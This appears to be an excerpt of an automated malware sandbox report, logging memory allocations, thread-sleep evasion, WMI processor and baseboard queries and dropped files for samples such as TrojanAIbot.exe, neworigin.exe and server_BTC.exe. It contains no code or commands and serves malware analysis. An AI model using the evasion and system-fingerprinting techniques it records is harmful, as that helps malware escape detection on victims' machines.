Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 1330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2E90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2680000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: C20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2680000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: C20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 1760000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 3570000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 3270000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2680000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2680000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 1090000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2E00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2D30000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 5636	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 4111	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6418
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 380
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 5004
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 4785
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 2164
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 3368
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 3462
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 6371

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Jump to dropped file

Source: C:\Users\Public\Libraries\Wisrysxl.PIF

API coverage: 9.7 %

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 1476	Thread sleep count: 5636 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99858s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99742s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99621s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99494s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99381s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99238s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99085s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 1476	Thread sleep count: 4111 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98857s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98720s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98588s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98473s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98349s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98205s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97680s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97548s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97424s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97296s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97180s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97070s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -96959s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -96836s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -96710s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -96602s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -96492s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -96381s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99316s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -99129s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98685s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98576s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -98110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97977s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97761s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97635s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97528s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97416s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97304s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97192s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -97066s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -96917s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -96324s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -96189s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -96061s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228	Thread sleep time: -95931s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 1272	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1680	Thread sleep count: 6418 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3552	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1680	Thread sleep count: 380 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5680	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7264	Thread sleep time: -300240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7264	Thread sleep time: -287100000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 1488	Thread sleep count: 42 > 30
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7680	Thread sleep count: 2164 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -99825s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -99696s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -99584s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -99460s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -99346s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7680	Thread sleep count: 3368 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -99224s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -99099s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -98974s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -98849s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -98724s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -98599s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -98409s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -98233s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -98076s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -97974s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -97849s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -97724s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -97599s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -97474s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -97349s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -97224s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -97099s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -96974s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -96849s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -96724s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -96599s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -96474s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -99824s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676	Thread sleep time: -99536s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 7600	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99860s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99745s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99633s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99513s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99401s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99292s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99171s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98945s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98762s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98485s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98370s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98260s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98111s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97995s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97886s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97775s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97667s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97558s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97448s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97339s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97229s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97083s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -96964s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -96855s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -96745s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -96636s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -96526s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -96400s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99855s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99749s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99177s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -99062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98836s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98296s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -98078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97749s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960	Thread sleep time: -97487s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 7892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 8012	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_02B15908

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99858	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99742	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99621	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99494	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99381	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99238	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99085	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98968	Jump to behavior
